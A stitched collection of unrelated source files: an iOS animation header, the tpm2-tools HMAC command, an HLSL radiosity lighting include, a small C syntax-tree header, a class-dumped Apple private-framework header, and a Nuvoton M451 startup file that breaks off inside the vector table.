// configuration surface is declared here; the animation itself lives in the
// implementation file of this class / its FNBaseAnimatedTransitioning base.
@interface FNFullImageAnimation : FNBaseAnimatedTransitioning

// The image displayed during the transition.
@property (nonatomic, strong) UIImage *image;

// Starting frame of the image — presumably in the transition container's
// coordinate space; confirm against the implementation before relying on it.
@property (nonatomic, assign) CGRect originalFrame;

@end
/* SPDX-License-Identifier: BSD-3-Clause */

#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "files.h"
#include "log.h"
#include "tpm2.h"
#include "tpm2_alg_util.h"
#include "tpm2_tool.h"

/* Aggregated command-line state for the tpm2 hmac tool. */
typedef struct tpm_hmac_ctx tpm_hmac_ctx;
struct tpm_hmac_ctx {
    struct {
        char *ctx_path;             /* -c: HMAC key object context */
        char *auth_str;             /* -p: authorization for the key */
        tpm2_loaded_object object;  /* resolved key handle + session */
    } hmac_key;

    FILE *input;                    /* data to HMAC; defaults to stdin */
    char *hmac_output_file_path;    /* -o: where to write the HMAC bytes */
    char *ticket_path;              /* -t: where to save the validation ticket */
    TPMI_ALG_HASH halg;             /* -g: hash algorithm for the HMAC */
    bool hex;                       /* --hex: print result as hex text */
    char *cp_hash_path;             /* --cphash: compute cpHash only */
};

static tpm_hmac_ctx ctx;

/*
 * Computes the HMAC over ctx.input with the loaded key.  Small inputs of a
 * known size use the one-shot TPM2_HMAC command; otherwise an HMAC sequence
 * (start/update/complete) is used.  On success *result (and, for the
 * sequence path, *validation) are allocated and must be freed by the caller.
 */
static tool_rc tpm_hmac_file(ESYS_CONTEXT *ectx, TPM2B_DIGEST **result,
        TPMT_TK_HASHCHECK **validation) {

    unsigned long file_size = 0;
    FILE *input = ctx.input;

    tool_rc rc;

    /* Suppress error reporting with NULL path */
    bool res = files_get_file_size(input, &file_size, NULL);

    /*
     * If we can get the file size and its less than 1024, just do it in one hash invocation.
     * We can't use the one-shot command if we require ticket, as it doesn't provide it in
     * the response from the TPM.
     */
    if (!ctx.ticket_path && res && file_size <= TPM2_MAX_DIGEST_BUFFER) {

        TPM2B_MAX_BUFFER buffer = { .size = file_size };

        res = files_read_bytes(ctx.input, buffer.buffer, buffer.size);
        if (!res) {
            LOG_ERR("Error reading input file!");
            return tool_rc_general_error;
        }

        /* cpHash-only mode: compute and save the command parameter hash,
         * skipping the actual HMAC output. */
        if (ctx.cp_hash_path) {
            LOG_WARN("Exiting without performing HMAC when calculating cpHash");
            TPM2B_DIGEST cp_hash = { .size = 0 };
            tool_rc rc = tpm2_hmac(ectx, &ctx.hmac_key.object, ctx.halg,
                    &buffer, result, &cp_hash);
            if (rc != tool_rc_success) {
                return rc;
            }

            bool result = files_save_digest(&cp_hash, ctx.cp_hash_path);
            if (!result) {
                rc = tool_rc_general_error;
            }
            return rc;
        }

        /*
         * hash algorithm specified in the key's scheme is used as the
         * hash algorithm for the HMAC
         */
        return tpm2_hmac(ectx, &ctx.hmac_key.object, ctx.halg, &buffer,
                result, NULL);
    }

    /* The sequence commands do not support cpHash calculation. */
    if (ctx.cp_hash_path) {
        LOG_ERR("Cannot calculate cpHash for buffers requiring HMAC sequence.");
        return tool_rc_general_error;
    }

    ESYS_TR sequence_handle;

    /*
     * Size is either unknown because the FILE * is a fifo, or it's too big
     * to do in a single hash call. Based on the size figure out the chunks
     * to loop over, if possible. This way we can call Complete with data.
     */
    rc = tpm2_hmac_start(ectx, &ctx.hmac_key.object, ctx.halg,
            &sequence_handle);
    if (rc != tool_rc_success) {
        return rc;
    }

    /* If we know the file size, we decrement the amount read and terminate the
     * loop when 1 block is left, else we go till feof.
     */
    size_t left = file_size;
    bool use_left = !!res;

    TPM2B_MAX_BUFFER data;

    bool done = false;
    while (!done) {

        size_t bytes_read = fread(data.buffer, 1,
                BUFFER_SIZE(typeof(data), buffer), input);
        if (ferror(input)) {
            LOG_ERR("Error reading from input file");
            return tool_rc_general_error;
        }

        data.size = bytes_read;

        /* if data was read, update the sequence */
        rc = tpm2_hmac_sequenceupdate(ectx, sequence_handle,
                &ctx.hmac_key.object, &data);
        if (rc != tool_rc_success) {
            return rc;
        }

        if (use_left) {
            left -= bytes_read;
            /* Stop once at most one final block remains; it is fed to the
             * SequenceComplete call below. */
            if (left <= TPM2_MAX_DIGEST_BUFFER) {
                done = true;
                continue;
            }
        } else if (feof(input)) {
            done = true;
        }
    } /* end file read/hash update loop */

    if (use_left) {
        /* Read the remaining bytes so Complete carries the final chunk. */
        data.size = left;
        bool res = files_read_bytes(input, data.buffer, left);
        if (!res) {
            LOG_ERR("Error reading from input file.");
            return tool_rc_general_error;
        }
    } else {
        data.size = 0;
    }

    rc = tpm2_hmac_sequencecomplete(ectx, sequence_handle,
            &ctx.hmac_key.object, &data, result, validation);
    if (rc != tool_rc_success) {
        return rc;
    }

    return tool_rc_success;
}

/*
 * Runs the HMAC computation and writes the digest (raw or hex) to the output
 * file or stdout, plus the validation ticket if one was requested.
 */
static tool_rc do_hmac_and_output(ESYS_CONTEXT *ectx) {

    TPM2B_DIGEST *hmac_out = NULL;
    TPMT_TK_HASHCHECK *validation = NULL;
    FILE *out = stdout;

    tool_rc rc = tpm_hmac_file(ectx, &hmac_out, &validation);
    if (rc != tool_rc_success || ctx.cp_hash_path) {
        goto out;
    }

    assert(hmac_out);

    if (ctx.ticket_path) {
        bool res = files_save_validation(validation, ctx.ticket_path);
        if (!res) {
            rc = tool_rc_general_error;
            goto out;
        }
    }

    /* Assume failure until the output is fully written. */
    rc = tool_rc_general_error;
    if (ctx.hmac_output_file_path) {
        out = fopen(ctx.hmac_output_file_path, "wb+");
        if (!out) {
            LOG_ERR("Could not open output file \"%s\", error: %s",
                    ctx.hmac_output_file_path, strerror(errno));
            goto out;
        }
    } else if (!output_enabled) {
        rc = tool_rc_success;
        goto out;
    }

    if (ctx.hex) {
        tpm2_util_print_tpm2b2(out, hmac_out);
    } else {
        bool res = files_write_bytes(out, hmac_out->buffer, hmac_out->size);
        if (!res) {
            goto out;
        }
    }

    rc = tool_rc_success;

out:
    if (out && out != stdout) {
        fclose(out);
    }

    free(hmac_out);
    free(validation);

    return rc;
}

/* Option callback: stores each recognized flag's value into ctx. */
static bool on_option(char key, char *value) {

    switch (key) {
    case 'c':
        ctx.hmac_key.ctx_path = value;
        break;
    case 'p':
        ctx.hmac_key.auth_str = value;
        break;
    case 'o':
        ctx.hmac_output_file_path = value;
        break;
    case 'g':
        ctx.halg = tpm2_alg_util_from_optarg(value, tpm2_alg_util_flags_hash);
        if (ctx.halg == TPM2_ALG_ERROR) {
            return false;
        }
        break;
    case 't':
        ctx.ticket_path = value;
        break;
    case 0:
        ctx.hex = true;
        break;
    case 1:
        ctx.cp_hash_path = value;
        break;
        /* no default */
    }
    return true;
}

/* Positional-argument callback: at most one input file; replaces the
 * default stdin input stream. */
static bool on_args(int argc, char **argv) {

    if (argc > 1) {
        LOG_ERR("Expected 1 hmac input file, got: %d", argc);
        return false;
    }

    ctx.input = fopen(argv[0], "rb");
    if (!ctx.input) {
        LOG_ERR("Error opening file \"%s\", error: %s", argv[0],
                strerror(errno));
        return false;
    }

    return true;
}

/* Registers the tool's command-line options with the tpm2_tool framework. */
bool tpm2_tool_onstart(tpm2_options **opts) {

    const struct option topts[] = {
        { "key-context",    required_argument, NULL, 'c' },
        { "auth",           required_argument, NULL, 'p' },
        { "output",         required_argument, NULL, 'o' },
        { "hash-algorithm", required_argument, NULL, 'g' },
        { "ticket",         required_argument, NULL, 't' },
        { "hex",            no_argument,       NULL,  0  },
        { "cphash",         required_argument, NULL,  1  },
    };

    ctx.input = stdin;

    *opts = tpm2_options_new("c:p:o:g:t:", ARRAY_LEN(topts), topts, on_option,
            on_args, 0);

    return *opts != NULL;
}

/* Thin wrapper: reads the key's public area (name/qualified name unused). */
static tool_rc readpub(ESYS_CONTEXT *ectx, ESYS_TR handle,
        TPM2B_PUBLIC **public) {

    return tpm2_readpublic(ectx, handle, public, NULL, NULL);
}

/* Tool entry point: loads/authorizes the key, resolves the hash algorithm
 * (falling back to the key's scheme, then SHA-256), and runs the HMAC. */
tool_rc tpm2_tool_onrun(ESYS_CONTEXT *ectx, tpm2_option_flags flags) {

    UNUSED(flags);

    /*
     * Option C must be specified.
     */
    if (!ctx.hmac_key.ctx_path) {
        LOG_ERR("Must specify options C.");
        return tool_rc_option_error;
    }

    tool_rc rc = tpm2_util_object_load_auth(ectx, ctx.hmac_key.ctx_path,
            ctx.hmac_key.auth_str, &ctx.hmac_key.object, false,
            TPM2_HANDLE_ALL_W_NV);
    if (rc != tool_rc_success) {
        LOG_ERR("Invalid key handle authorization");
        return rc;
    }

    /*
     * if no halg was specified, read the public portion of the key and use it's
     * scheme
     */
    if (!ctx.halg) {
        TPM2B_PUBLIC *pub = NULL;
        rc = readpub(ectx, ctx.hmac_key.object.tr_handle, &pub);
        if (rc != tool_rc_success) {
            return rc;
        }

        /*
         * if we're attempting to figure out a hashing scheme, and the scheme is NULL
         * we default to sha256.
         */
        ctx.halg =
            pub->publicArea.parameters.keyedHashDetail.scheme.details.hmac.hashAlg;
        if (ctx.halg == TPM2_ALG_NULL) {
            ctx.halg = TPM2_ALG_SHA256;
        }
        free(pub);
    }

    return do_hmac_and_output(ectx);
}

/* Tool teardown: closes the input file (if not stdin) and the auth session. */
tool_rc tpm2_tool_onstop(ESYS_CONTEXT *ectx) {
    UNUSED(ectx);

    if (ctx.input && ctx.input != stdin) {
        fclose(ctx.input);
    }

    return tpm2_session_close(&ctx.hmac_key.object.session);
}
#ifndef COMMON_LIGHTING_H
#define COMMON_LIGHTING_H

// World-space extent of the close radiosity grid (step size * sample counts).
static const float3 flWorldGridSize = float3(
	RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_XY,
	RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_XY,
	RADIOSITY_BUFFER_GRID_STEP_SIZE_CLOSE * RADIOSITY_BUFFER_SAMPLES_Z );

// World-space extent of the far (coarser) radiosity grid.
static const float3 flWorldGridSize_Far = float3(
	RADIOSITY_BUFFER_GRID_STEP_SIZE_FAR * RADIOSITY_BUFFER_SAMPLES_XY,
	RADIOSITY_BUFFER_GRID_STEP_SIZE_FAR * RADIOSITY_BUFFER_SAMPLES_XY,
	RADIOSITY_BUFFER_GRID_STEP_SIZE_FAR * RADIOSITY_BUFFER_SAMPLES_Z );

// Half-texel offset so samples land on texel centers.
static const float2 flRadiosityTexelSizeHalf = float2(
	0.5f / RADIOSITY_BUFFER_RES_X,
	0.5f / RADIOSITY_BUFFER_RES_Y );

// Ratio of one grid tile to the whole radiosity atlas.
static const float2 flRadiosityUVRatio = float2(
	RADIOSITY_UVRATIO_X, RADIOSITY_UVRATIO_Y );

// Sample a 2D projected-texture light cookie.
float3 DoStandardCookie( sampler sCookie, float2 uvs )
{
	return tex2D( sCookie, uvs ).rgb;
}

// Sample a cubemap light cookie by light-to-pixel direction.
float3 DoCubemapCookie( sampler sCubemap, float3 delta )
{
	return texCUBE( sCubemap, delta ).rgb;
}

// Combine diffuse/ambient into the final light value.
// litdot_lamount_spec_fade packs: x = N.L term, y = light amount,
// z = specular, w = distance fade.
float4 DoLightFinal( float3 diffuse, float3 ambient, float4 litdot_lamount_spec_fade )
{
#if DEFCFG_CHEAP_LIGHTS
	return float4( diffuse * litdot_lamount_spec_fade.y, 0 );
#else
	return float4( lerp( ambient, diffuse * ( litdot_lamount_spec_fade.x ),
			litdot_lamount_spec_fade.y ),
		litdot_lamount_spec_fade.z * litdot_lamount_spec_fade.y )
		* litdot_lamount_spec_fade.w;
#endif
}

// Same as DoLightFinal, but modulated by a cookie color; spec is scaled by
// the cookie's luma (Rec.601 weights).
float4 DoLightFinalCookied( float3 diffuse, float3 ambient, float4 litdot_lamount_spec_fade,
	float3 vecCookieRGB )
{
#if DEFCFG_CHEAP_LIGHTS
	return float4( diffuse * vecCookieRGB * litdot_lamount_spec_fade.y, 0 );
#else
	return float4( lerp( ambient, diffuse * vecCookieRGB * ( litdot_lamount_spec_fade.x ),
			litdot_lamount_spec_fade.y ),
		litdot_lamount_spec_fade.z * litdot_lamount_spec_fade.y
			* dot( vecCookieRGB, float3( 0.3f, 0.59f, 0.11f ) ) )
		* litdot_lamount_spec_fade.w;
#endif
}

// Sample the radiosity volume (stored as a 2D atlas of Z-slices) with manual
// trilinear filtering: hardware bilinear in XY, manual lerp between the two
// enclosing Z slices. vecPositionDelta is the normalized [0,1] grid position;
// vecUVOffset selects the close (0) or far (0.5 in Y) half of the atlas.
float3 GetBilinearRadiositySample( sampler RadiositySampler, float3 vecPositionDelta,
	float2 vecUVOffset )
{
	float2 flGridUVLocal = vecPositionDelta.xy / RADIOSITY_BUFFER_GRIDS_PER_AXIS;

	// Split the Z coordinate into (row, column) indices of the slice atlas.
	float2 flGridIndexSplit;
	flGridIndexSplit.x = modf( vecPositionDelta.z * RADIOSITY_BUFFER_GRIDS_PER_AXIS,
		flGridIndexSplit.y );
	flGridIndexSplit.x *= RADIOSITY_BUFFER_GRIDS_PER_AXIS;

	// Fractional part between the lower and upper Z slice.
	float flSampleFrac = modf( flGridIndexSplit.x, flGridIndexSplit.x );
	flGridIndexSplit /= RADIOSITY_BUFFER_GRIDS_PER_AXIS;

	float2 flGridUVLow = flRadiosityUVRatio * (flGridUVLocal + flGridIndexSplit)
		+ flRadiosityTexelSizeHalf;

	// Atlas coordinates of the next-higher Z slice.
	flGridIndexSplit.x = modf( ( floor( vecPositionDelta.z * RADIOSITY_BUFFER_SAMPLES_Z ) + 1 )
		/ RADIOSITY_BUFFER_GRIDS_PER_AXIS, flGridIndexSplit.y );
	flGridIndexSplit.y /= RADIOSITY_BUFFER_GRIDS_PER_AXIS;

	float2 flGridUVHigh = flRadiosityUVRatio * (flGridUVLocal + flGridIndexSplit)
		+ flRadiosityTexelSizeHalf;

	return lerp( tex2D( RadiositySampler, flGridUVLow + vecUVOffset ).rgb,
		tex2D( RadiositySampler, flGridUVHigh + vecUVOffset ).rgb,
		flSampleFrac );
}

// Evaluate indirect lighting for a world position from the close/far
// radiosity grids. With RADIOSITY_SMOOTH_TRANSITION the two grids are
// cross-faded near the close grid's border; otherwise the far grid is
// selected outright once the position leaves the close grid.
float3 DoRadiosity( float3 worldPos, sampler RadiositySampler,
	float3 vecRadiosityOrigin, float3 vecRadiosityOrigin_Far, float flRadiositySettings )
{
#if RADIOSITY_SMOOTH_TRANSITION == 1

	float3 vecDeltaFar = ( worldPos - vecRadiosityOrigin_Far ) / flWorldGridSize_Far;

#if VENDOR == VENDOR_FXC_AMD
	AMD_PRE_5K_NON_COMPLIANT
#elif ( DEFCFG_DEFERRED_SHADING == 0 )
	// Outside the far grid entirely: kill the fragment.
	clip( 0.5f - any( floor( vecDeltaFar ) ) );
#else
	// Deferred shading can't clip; zero the contribution instead.
	flRadiositySettings *= 1 - any( floor( vecDeltaFar ) );
#endif

	float3 vecDeltaClose = ( worldPos - vecRadiosityOrigin ) / flWorldGridSize;

	// Blend weight ramps 0 -> 1 as the position approaches the close grid edge.
	float3 flTransition = abs( saturate( vecDeltaClose ) * 2 - 1 );
	float flBlendAmt = max( flTransition.x, max( flTransition.y, flTransition.z ) );
	flBlendAmt = smoothstep( 0.7f, 1.0f, flBlendAmt );

	return lerp( GetBilinearRadiositySample( RadiositySampler, vecDeltaClose, float2(0,0) ),
		GetBilinearRadiositySample( RadiositySampler, vecDeltaFar, float2(0,0.5f) ),
		flBlendAmt ) * flRadiositySettings.x;

#else

	float3 vecDelta = ( worldPos - vecRadiosityOrigin ) / flWorldGridSize;

#if VENDOR == VENDOR_FXC_AMD
	AMD_PRE_5K_NON_COMPLIANT
#else
	// 1 when the position falls outside the (slightly shrunk) close grid.
	float flLerpTo1 = any( floor( (vecDelta.xyz - 0.025f) * 1.05f) );
#endif

	// Hard-switch to the far grid when outside the close one.
	vecDelta = lerp( vecDelta, ( worldPos - vecRadiosityOrigin_Far ) / flWorldGridSize_Far,
		flLerpTo1 );

	// Far-grid data lives in the lower half of the atlas (Y offset 0.5).
	float2 flUV_Y_Offset = float2( 0, flLerpTo1 ) * 0.5f;

#if VENDOR == VENDOR_FXC_AMD
	AMD_PRE_5K_NON_COMPLIANT
#elif ( DEFCFG_DEFERRED_SHADING == 0 )
	clip( 0.5f - any( floor( vecDelta ) ) );
#else
	// BUGFIX: originally referenced vecDeltaFar, which is not declared in
	// this branch (it only exists when RADIOSITY_SMOOTH_TRANSITION == 1)
	// and would fail to compile. The grid-bounds test here is on vecDelta.
	flRadiositySettings *= 1 - any( floor( vecDelta ) );
#endif

	return GetBilinearRadiositySample( RadiositySampler, vecDelta, flUV_Y_Offset )
		* flRadiositySettings.x;

#endif
}

#endif
#ifndef TREE_HEADER
#define TREE_HEADER

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>

/* Discriminator for the AST node variants stored in nodeType's union. */
typedef enum { typeCon, typeId, typeOpr, typeFunc} nodeEnum;

/* Integer constant node. */
typedef struct {
    int value;                 /* literal value */
} conNodeType;

/* Identifier node. */
typedef struct {
    int i;                     /* index into the global sym[] table (a-z) */
} idNodeType;

/* Function reference node. */
typedef struct {
    char *name;                /* function name; ownership not shown here */
} funcNodeType;

/* Operator node. */
typedef struct {
    int oper;                  /* operator token */
    int nops;                  /* number of operands */
    struct nodeTypeTag *op[1]; /* operand array; over-allocated at creation
                                  time (pre-C99 flexible-array idiom) */
} oprNodeType;

/* Tagged-union AST node: 'type' selects the active union member. */
typedef struct nodeTypeTag{
    nodeEnum type;             /* variant selector */

    union {
        conNodeType con;       /* valid when type == typeCon */
        idNodeType id;         /* valid when type == typeId */
        funcNodeType func;     /* valid when type == typeFunc */
        oprNodeType opr;       /* valid when type == typeOpr */
    };
} nodeType;

/* Symbol table for single-letter variables, defined elsewhere. */
extern int sym[26];

#endif
/* Generated by RuntimeBrowser
   Image: /System/Library/PrivateFrameworks/DoNotDisturbServer.framework/DoNotDisturbServer
 */

/* NOTE(review): auto-generated class-dump style header; declarations only.
 * Immutable record aggregating the three DND settings sub-records
 * (behavior, phone-call bypass, schedule). Conforms to NSCopying /
 * NSMutableCopying and the private DNDSBackingStoreRecord protocol. */
@interface DNDSSettingsRecord : NSObject <DNDSBackingStoreRecord, NSCopying, NSMutableCopying> {
    DNDSBehaviorSettingsRecord * _behaviorSettings;
    DNDSBypassSettingsRecord * _phoneCallBypassSettings;
    DNDSScheduleSettingsRecord * _scheduleSettings;
}

@property (nonatomic, readonly, copy) DNDSBehaviorSettingsRecord *behaviorSettings;
@property (readonly, copy) NSString *debugDescription;
@property (readonly, copy) NSString *description;
@property (readonly) unsigned long long hash;
@property (nonatomic, readonly, copy) DNDSBypassSettingsRecord *phoneCallBypassSettings;
@property (nonatomic, readonly, copy) DNDSScheduleSettingsRecord *scheduleSettings;
@property (readonly) Class superclass;

/* Backing-store construction / versioned migration of the persisted dict. */
+ (id)backingStoreWithFileURL:(id)arg1;
+ (id)migrateDictionaryRepresentation:(id)arg1 fromVersionNumber:(unsigned long long)arg2 toVersionNumber:(unsigned long long)arg3;
+ (id)recordWithEncodedInfo:(id)arg1 error:(id*)arg2;

- (void).cxx_destruct;
- (id)_initWithBehaviorSettings:(id)arg1 phoneCallBypassSettings:(id)arg2 scheduleSettings:(id)arg3;
- (id)_initWithRecord:(id)arg1;
- (id)behaviorSettings;
- (id)copyWithZone:(struct _NSZone { }*)arg1;
- (id)description;
- (id)dictionaryRepresentation;
- (unsigned long long)hash;
- (id)init;
- (id)initWithDictionaryRepresentation:(id)arg1;
- (bool)isEqual:(id)arg1;
- (id)mutableCopyWithZone:(struct _NSZone { }*)arg1;
- (id)phoneCallBypassSettings;
- (id)scheduleSettings;

@end
/******************************************************************************
 * @file     startup_M451Series.c
 * @version  V0.10
 * $Revision: 11 $
 * $Date: 15/09/02 10:02a $
 * @brief    CMSIS Cortex-M4 Core Peripheral Access Layer Source File for M451 Series MCU
 *
 * @note
 * Copyright (C) 2013~2015 Nuvoton Technology Corp. All rights reserved.
 *****************************************************************************/

#include "M451Series.h"

/* Suppress warning messages */
#if defined(__CC_ARM)
// Suppress warning message: extended constant initialiser used
#pragma diag_suppress 1296
#elif defined(__ICCARM__)
#elif defined(__GNUC__)
#endif

/* Macro Definitions
 * WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) declares FUN as a weak alias of FUN_ALIAS,
 * so every IRQ handler below defaults to Default_Handler unless the
 * application provides its own definition. */
#if defined(__CC_ARM)
#define WEAK            __attribute__ ((weak))
#define ALIAS(f)        __attribute__ ((weak, alias(#f)))

#define WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) \
void FUN(void) __attribute__ ((weak, alias(#FUN_ALIAS)));

#elif defined(__ICCARM__)
//#define STRINGIFY(x) #x
//#define _STRINGIFY(x) STRINGIFY(x)
/* IAR spells weak aliasing via a pragma built from token pasting. */
#define WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) \
void FUN(void); \
_Pragma(_STRINGIFY(_WEAK_ALIAS_FUNC(FUN, FUN_ALIAS)))
#define _WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) weak __WEAK_ALIAS_FUNC(FUN, FUN_ALIAS)
#define __WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) FUN##=##FUN_ALIAS

#elif defined(__GNUC__)
#define WEAK            __attribute__ ((weak))
#define ALIAS(f)        __attribute__ ((weak, alias(#f)))

#define WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) \
void FUN(void) __attribute__ ((weak, alias(#FUN_ALIAS)));

#endif

/* Initialize segments: linker-provided symbols per toolchain. */
#if defined(__CC_ARM)
extern uint32_t Image$$ARM_LIB_STACK$$ZI$$Limit;
extern void __main(void);
#elif defined(__ICCARM__)
void __iar_program_start(void);
#elif defined(__GNUC__)
extern uint32_t __StackTop;          /* initial stack pointer */
extern uint32_t __etext;             /* end of .text = load address of .data */
extern uint32_t __data_start__;
extern uint32_t __data_end__;
extern uint32_t __bss_start__;
extern uint32_t __bss_end__;

extern void uvisor_init(void);
//#if defined(TOOLCHAIN_GCC_ARM)
//extern void _start(void);
//#endif
extern void software_init_hook(void) __attribute__((weak));
extern void __libc_init_array(void);
extern int main(void);
#endif

/* Default empty handler */
void Default_Handler(void);

/* Reset handler */
void Reset_Handler(void);

/* Cortex-M4 core handlers */
WEAK_ALIAS_FUNC(NMI_Handler, Default_Handler)
WEAK_ALIAS_FUNC(HardFault_Handler, Default_Handler)
WEAK_ALIAS_FUNC(MemManage_Handler, Default_Handler)
WEAK_ALIAS_FUNC(BusFault_Handler , Default_Handler)
WEAK_ALIAS_FUNC(UsageFault_Handler, Default_Handler)
WEAK_ALIAS_FUNC(SVC_Handler, Default_Handler)
WEAK_ALIAS_FUNC(DebugMon_Handler, Default_Handler)
WEAK_ALIAS_FUNC(PendSV_Handler, Default_Handler)
WEAK_ALIAS_FUNC(SysTick_Handler, Default_Handler)

/* Peripherals handlers */
WEAK_ALIAS_FUNC(BOD_IRQHandler, Default_Handler)        // 0: Brown Out detection
WEAK_ALIAS_FUNC(IRC_IRQHandler, Default_Handler)        // 1: Internal RC
WEAK_ALIAS_FUNC(PWRWU_IRQHandler, Default_Handler)      // 2: Power down wake up
WEAK_ALIAS_FUNC(RAMPE_IRQHandler, Default_Handler)      // 3: RAM parity error
WEAK_ALIAS_FUNC(CLKFAIL_IRQHandler, Default_Handler)    // 4: Clock detection fail
                                                        // 5: Reserved
WEAK_ALIAS_FUNC(RTC_IRQHandler, Default_Handler)        // 6: Real Time Clock
WEAK_ALIAS_FUNC(TAMPER_IRQHandler, Default_Handler)     // 7: Tamper detection
WEAK_ALIAS_FUNC(WDT_IRQHandler, Default_Handler)        // 8: Watchdog timer
WEAK_ALIAS_FUNC(WWDT_IRQHandler, Default_Handler)       // 9: Window watchdog timer
WEAK_ALIAS_FUNC(EINT0_IRQHandler, Default_Handler)      // 10: External Input 0
WEAK_ALIAS_FUNC(EINT1_IRQHandler, Default_Handler)      // 11: External Input 1
WEAK_ALIAS_FUNC(EINT2_IRQHandler, Default_Handler)      // 12: External Input 2
WEAK_ALIAS_FUNC(EINT3_IRQHandler, Default_Handler)      // 13: External Input 3
WEAK_ALIAS_FUNC(EINT4_IRQHandler, Default_Handler)      // 14: External Input 4
WEAK_ALIAS_FUNC(EINT5_IRQHandler, Default_Handler)      // 15: External Input 5
WEAK_ALIAS_FUNC(GPA_IRQHandler, Default_Handler)        // 16: GPIO Port A
WEAK_ALIAS_FUNC(GPB_IRQHandler, Default_Handler)        // 17: GPIO Port B
WEAK_ALIAS_FUNC(GPC_IRQHandler, Default_Handler)        // 18: GPIO Port C
WEAK_ALIAS_FUNC(GPD_IRQHandler, Default_Handler)        // 19: GPIO Port D
WEAK_ALIAS_FUNC(GPE_IRQHandler, Default_Handler)        // 20: GPIO Port E
WEAK_ALIAS_FUNC(GPF_IRQHandler, Default_Handler)        // 21: GPIO Port F
WEAK_ALIAS_FUNC(SPI0_IRQHandler, Default_Handler)       // 22: SPI0
WEAK_ALIAS_FUNC(SPI1_IRQHandler, Default_Handler)       // 23: SPI1
WEAK_ALIAS_FUNC(BRAKE0_IRQHandler, Default_Handler)     // 24:
WEAK_ALIAS_FUNC(PWM0P0_IRQHandler, Default_Handler)     // 25:
WEAK_ALIAS_FUNC(PWM0P1_IRQHandler, Default_Handler)     // 26:
WEAK_ALIAS_FUNC(PWM0P2_IRQHandler, Default_Handler)     // 27:
WEAK_ALIAS_FUNC(BRAKE1_IRQHandler, Default_Handler)     // 28:
WEAK_ALIAS_FUNC(PWM1P0_IRQHandler, Default_Handler)     // 29:
WEAK_ALIAS_FUNC(PWM1P1_IRQHandler, Default_Handler)     // 30:
WEAK_ALIAS_FUNC(PWM1P2_IRQHandler, Default_Handler)     // 31:
WEAK_ALIAS_FUNC(TMR0_IRQHandler, Default_Handler)       // 32: Timer 0
WEAK_ALIAS_FUNC(TMR1_IRQHandler, Default_Handler)       // 33: Timer 1
WEAK_ALIAS_FUNC(TMR2_IRQHandler, Default_Handler)       // 34: Timer 2
WEAK_ALIAS_FUNC(TMR3_IRQHandler, Default_Handler)       // 35: Timer 3
WEAK_ALIAS_FUNC(UART0_IRQHandler, Default_Handler)      // 36: UART0
WEAK_ALIAS_FUNC(UART1_IRQHandler, Default_Handler)      // 37: UART1
WEAK_ALIAS_FUNC(I2C0_IRQHandler, Default_Handler)       // 38: I2C0
WEAK_ALIAS_FUNC(I2C1_IRQHandler, Default_Handler)       // 39: I2C1
WEAK_ALIAS_FUNC(PDMA_IRQHandler, Default_Handler)       // 40: Peripheral DMA
WEAK_ALIAS_FUNC(DAC_IRQHandler, Default_Handler)        // 41: DAC
WEAK_ALIAS_FUNC(ADC00_IRQHandler, Default_Handler)      // 42: ADC0 interrupt source 0
WEAK_ALIAS_FUNC(ADC01_IRQHandler, Default_Handler)      // 43: ADC0 interrupt source 1
WEAK_ALIAS_FUNC(ACMP01_IRQHandler, Default_Handler)     // 44: ACMP0 and ACMP1
                                                        // 45: Reserved
WEAK_ALIAS_FUNC(ADC02_IRQHandler, Default_Handler)      // 46: ADC0 interrupt source 2
WEAK_ALIAS_FUNC(ADC03_IRQHandler, Default_Handler)      // 47: ADC0 interrupt source 3
WEAK_ALIAS_FUNC(UART2_IRQHandler, Default_Handler)      // 48: UART2
WEAK_ALIAS_FUNC(UART3_IRQHandler, Default_Handler)      // 49: UART3
                                                        // 50: Reserved
WEAK_ALIAS_FUNC(SPI2_IRQHandler, Default_Handler)       // 51: SPI2
                                                        // 52: Reserved
WEAK_ALIAS_FUNC(USBD_IRQHandler, Default_Handler)       // 53: USB device
WEAK_ALIAS_FUNC(USBH_IRQHandler, Default_Handler)       // 54: USB host
WEAK_ALIAS_FUNC(USBOTG_IRQHandler, Default_Handler)     // 55: USB OTG
WEAK_ALIAS_FUNC(CAN0_IRQHandler, Default_Handler)       // 56: CAN0
                                                        // 57: Reserved
WEAK_ALIAS_FUNC(SC0_IRQHandler, Default_Handler)        // 58:
                                                        // 59: Reserved.
                                                        // 60:
                                                        // 61:
                                                        // 62:
WEAK_ALIAS_FUNC(TK_IRQHandler, Default_Handler)         // 63:

/* Vector table: initial SP, then the 15 Cortex-M system exceptions, then
 * the 64 external interrupt vectors in the exact order expected by the
 * NVIC. Entry order/position must not change. */
#if defined(__CC_ARM)
__attribute__ ((section("RESET")))
const uint32_t __vector_handlers[] = {
#elif defined(__ICCARM__)
extern uint32_t CSTACK$$Limit;
const uint32_t __vector_table[] @ ".intvec" = {
#elif defined(__GNUC__)
__attribute__ ((section(".vector_table")))
const uint32_t __vector_handlers[] = {
#endif

    /* Configure Initial Stack Pointer, using linker-generated symbols */
#if defined(__CC_ARM)
    (uint32_t) &Image$$ARM_LIB_STACK$$ZI$$Limit,
#elif defined(__ICCARM__)
    //(uint32_t) __sfe("CSTACK"),
    (uint32_t) &CSTACK$$Limit,
#elif defined(__GNUC__)
    (uint32_t) &__StackTop,
#endif

    (uint32_t) Reset_Handler,           // Reset Handler
    (uint32_t) NMI_Handler,             // NMI Handler
    (uint32_t) HardFault_Handler,       // Hard Fault Handler
    (uint32_t) MemManage_Handler,       // MPU Fault Handler
    (uint32_t) BusFault_Handler,        // Bus Fault Handler
    (uint32_t) UsageFault_Handler,      // Usage Fault Handler
    0,                                  // Reserved
    0,                                  // Reserved
    0,                                  // Reserved
    0,                                  // Reserved
    (uint32_t) SVC_Handler,             // SVCall Handler
    (uint32_t) DebugMon_Handler,        // Debug Monitor Handler
    0,                                  // Reserved
    (uint32_t) PendSV_Handler,          // PendSV Handler
    (uint32_t) SysTick_Handler,         // SysTick Handler

